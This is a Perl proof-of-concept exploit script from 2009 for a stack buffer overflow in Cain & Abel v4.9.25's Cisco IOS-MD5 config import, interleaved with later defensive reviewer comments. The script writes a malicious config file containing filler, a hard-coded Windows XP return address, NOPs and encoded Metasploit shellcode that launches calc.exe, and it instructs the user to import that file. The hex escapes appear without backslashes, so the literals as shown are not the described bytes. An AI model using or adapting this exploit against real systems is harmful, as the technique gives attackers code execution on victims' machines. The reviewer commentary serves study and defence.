
cainabel4925-overflow.txt

Posted on 07 January 2009

#!perl -w
# Simple overflow for Cain & Abel v4.9.25 (and below?)
# This script will output a file; import this file as a
# config file under Cracker -> Cisco IOS-MD5 Hashes
#
# If Cain crashes but calc.exe isn't run, change $eip to reflect
# your system.
#
# send9 /at/ chiseclabs.com
#
# Reviewer notes (what this listing shows, read defensively):
#   * Purpose: builds one string ($pad . $eip . $nop . $shellcode) and writes
#     it to cain_ios_ex.conf in the current directory. The bug itself is in
#     Cain's importer for Cisco IOS-MD5 config files; this script only
#     produces the malformed input.
#   * Root cause is presumably an unbounded copy of imported file content into
#     a fixed-size stack buffer (the layout below puts a 4-byte value right
#     after 100 filler characters) -- not confirmed by anything on this page.
#   * The return address is hard-coded for one OS build (see the $eip
#     comment), and the author notes it must be changed per system. Systems
#     with ASLR do not keep module addresses fixed, and DEP blocks execution
#     from the stack; both undercut the assumptions this layout relies on.
#   * Triage/detection hints: Cain crashing on import, or Cain starting a
#     child process it normally would not (calc.exe here, per the payload
#     comment). The output file name is only this script's choice, so a
#     file-name match alone is a weak indicator.
#   * Mitigation: treat config files from other parties as untrusted input
#     and run a release newer than the affected one named above, if the
#     vendor has fixed it -- the page does not state a fixed version.
#   * NOTE(review): as this page renders the script, the hex escapes appear
#     without backslashes, so the literals below are plain ASCII text
#     ("x90" is three characters) rather than the byte values the comments
#     describe.
use strict;

# 4-byte value placed directly after the filler; named for the saved
# instruction pointer it is presumably meant to replace.
my $eip = "xD8x69x83x7C"; # 0x7C8369D8 - kernel32.dll, call esp (WinXP SP2)
# Literal repeated four times, placed between the address and the payload.
my $nop = "x90" x 4;
# 100 filler characters written ahead of $eip.
my $pad = "A" x 100;

# win32_exec - EXITFUNC=seh CMD=calc.exe Size=351 Encoder=PexAlphaNum http://metasploit.com
# Per the generator comment above, this is a proof-of-concept payload whose
# command is calc.exe, emitted by an alphanumeric encoder.
my $shellcode = "xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49".
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36".
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34".
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41".
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x54".
"x42x50x42x30x42x50x4bx48x45x44x4ex53x4bx58x4ex57".
"x45x50x4ax47x41x30x4fx4ex4bx58x4fx44x4ax31x4bx58".
"x4fx35x42x32x41x30x4bx4ex49x44x4bx48x46x53x4bx48".
"x41x50x50x4ex41x43x42x4cx49x59x4ex4ax46x38x42x4c".
"x46x57x47x50x41x4cx4cx4cx4dx30x41x50x44x4cx4bx4e".
"x46x4fx4bx43x46x45x46x52x46x50x45x47x45x4ex4bx48".
"x4fx55x46x52x41x50x4bx4ex48x56x4bx58x4ex50x4bx54".
"x4bx58x4fx35x4ex51x41x50x4bx4ex4bx58x4ex31x4bx38".
"x41x30x4bx4ex49x58x4ex55x46x32x46x30x43x4cx41x43".
"x42x4cx46x46x4bx38x42x44x42x53x45x38x42x4cx4ax47".
"x4ex30x4bx38x42x34x4ex30x4bx58x42x47x4ex51x4dx4a".
"x4bx48x4ax56x4ax50x4bx4ex49x50x4bx48x42x38x42x4b".
"x42x30x42x30x42x30x4bx48x4ax46x4ex33x4fx35x41x33".
"x48x4fx42x46x48x55x49x38x4ax4fx43x58x42x4cx4bx47".
"x42x35x4ax56x42x4fx4cx38x46x50x4fx55x4ax36x4ax49".
"x50x4fx4cx58x50x30x47x35x4fx4fx47x4ex43x46x41x36".
"x4ex46x43x46x50x32x45x56x4ax37x45x56x42x30x5a";

# Final file content, in order: filler, address value, $nop run, payload.
my $b00m = $pad . $eip . $nop . $shellcode;

# Writes the string to a fixed file name in the working directory, truncating
# any existing file of that name (">" mode); dies if the open fails.
open(BOF,">cain_ios_ex.conf") or die "Error: Can't open a file for writing ";
print BOF $b00m;
close(BOF);

# Operator message only; the script does not start or interact with Cain.
print "Now just open cain_ios_ex.conf as a configuration file under Cracker -> Cisco IOS-MD5 Hashes. ";

 
